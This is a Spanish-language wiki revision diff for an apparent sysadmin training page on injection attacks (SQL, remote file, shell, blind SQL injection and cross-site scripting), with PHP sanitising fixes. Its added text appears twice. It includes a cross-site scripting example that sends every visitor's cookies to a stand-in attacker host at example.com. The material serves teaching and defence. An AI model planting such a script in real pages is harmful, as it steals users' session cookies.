Additions:
---
CategorySysAdmin
CategorySysAdmin
Additions:
Tipo de capacitación: técnica pública
Deletions:
Additions:
Enlace: http://en.wikipedia.org/wiki/Code_injection
Additions:
Tipo de capacitación: pública
Additions:
Es la injection de código sql debido a que al guardar información en la base de datos no limpiamos los datos enviados por el usuario.
Limpiar toda variable antes de guardarla. Todas estas soluciones se pueden combinar, en muchos casos se deben combinar:
%%(php)settype($user_id, 'int');%%
**Notas:**
Injection también puede ocurrir a un archivo (RFI remote file injection), o a un comando que luego ejecutemos: shell injection.
Blind Sql Injection: Normalmente injection es facilitada por los mensajes de error, con blind sql injection solo se tiene la opcion de éxito o fracaso, accediendo al catálogo se va construyendo el ataque.
Es el opuesto, de cierto modo, es el injectar código malicioso a los datos para luego actuar al ser mostrados en pantalla.
Generalmente usado para “phishing”. Ataque, injectar en mi blog, o artículo. Un ejemplo que registraria en la bitacora maquina del atacante (example.com), los cookies de todo visitante del sitio donde se colocó el injection.
%%
<script>
document.write('<script src="http://www.example.com/get_cookies?cookies='
document.write(document.cookie)
document.write('"></script>');
</script>
%%
Este ejemplo registraria en la bitacora maquina del atacante (example.com), los cookies
Solución:
Limpiar toda variable que se tome (de la base de datos) a la pantalla.
%%(php)$datos = htmlentities($datos)
# ó
$datos = htmlspecialchars($datos)%%
Limpiar toda variable antes de guardarla. Todas estas soluciones se pueden combinar, en muchos casos se deben combinar:
%%(php)settype($user_id, 'int');%%
**Notas:**
Injection también puede ocurrir a un archivo (RFI remote file injection), o a un comando que luego ejecutemos: shell injection.
Blind Sql Injection: Normalmente injection es facilitada por los mensajes de error, con blind sql injection solo se tiene la opcion de éxito o fracaso, accediendo al catálogo se va construyendo el ataque.
Es el opuesto, de cierto modo, es el injectar código malicioso a los datos para luego actuar al ser mostrados en pantalla.
Generalmente usado para “phishing”. Ataque, injectar en mi blog, o artículo. Un ejemplo que registraria en la bitacora maquina del atacante (example.com), los cookies de todo visitante del sitio donde se colocó el injection.
%%
<script>
document.write('<script src="http://www.example.com/get_cookies?cookies='
document.write(document.cookie)
document.write('"></script>');
</script>
%%
Este ejemplo registraria en la bitacora maquina del atacante (example.com), los cookies
Solución:
Limpiar toda variable que se tome (de la base de datos) a la pantalla.
%%(php)$datos = htmlentities($datos)
# ó
$datos = htmlspecialchars($datos)%%
Deletions:
Limpiar toda variable antes de guardarla. Esto puede ser tarea del la libreria que usas para acceder los datos.
Todas se pueden combinar, en muchos casos se deben combinar:
%%(php)settype($user_id, 'int');
http://www.php.net/manual/en/function.settype.php
(o ejecutar un shell o guardar un archivo
